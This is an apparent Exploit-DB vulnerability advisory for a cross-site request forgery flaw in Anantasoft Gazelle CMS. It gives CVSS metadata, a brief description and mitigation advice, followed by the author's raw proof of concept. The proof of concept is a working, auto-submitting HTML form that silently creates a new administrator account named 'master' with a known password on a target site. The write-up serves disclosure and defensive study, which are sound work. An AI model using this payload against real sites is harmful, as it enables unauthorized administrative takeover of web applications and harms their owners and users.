Anantasoft Gazelle CMS CSRF Vulnerability

vendor:

Gazelle CMS

by:

Pratul Agrawal

5.5

CVSS

MEDIUM

Cross Site Request Forgery (CSRF)

CSRF

CWE

Product Name: Gazelle CMS

Affected Version From: Not provided

Affected Version To: Not provided

Patch Exists: No

Related CWE: Not provided

CPE: Not provided

Metasploit:

Other Scripts:

Platforms Tested:

Not provided

Anantasoft Gazelle CMS CSRF Vulnerability

The vulnerability allows an attacker to add an admin user through a Cross Site Request Forgery attack. The attacker can submit a form with hidden fields containing the necessary information to create a new admin user.

Mitigation:

Implementing CSRF tokens, validating requests, and using secure coding practices can help mitigate this vulnerability.

Source

Exploit-DB raw data:

                                =======================================================================
   
                                              Anantasoft Gazelle CMS CSRF Vulnerability
 
                                =======================================================================
   
                                                               by
   
                                                         Pratul Agrawal
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      Anantasoft_Gazelle_CMS

  # Category  	  CMS / Portals
  
  # Plateform     php
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://server/demo/2/193/Anantasoft_Gazelle_CMS
  
 
   Script to Add the Admin user through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>

                          <body>

                             <form name="XYZ" action="http://site/gazelle/admin/index.php?Users/Add%20User" method="post">

                                    <input type=hidden name="name" value="master">

                                    <input type=hidden name="pass" value="master">

                                    <input type=hidden name="controle" value="master">

                                    <input type=hidden name="email" value="master%40yahoo.com">

                                    <input type=hidden name="active" value="on">

                                    <input type=hidden name="showemail" value="on">

                                    <input type=hidden name="admin%5B%5D" value="2">

                                    <input type=hidden name="save" value="Add">

                                    <input type=hidden name="table" value="users">

                                    <input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36">
                             </form>

                               <script>

                                 document.XYZ.submit();

                               </script>

                          </body>

                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege.
  
  
#If you have any questions, comments, or concerns, feel free to contact me.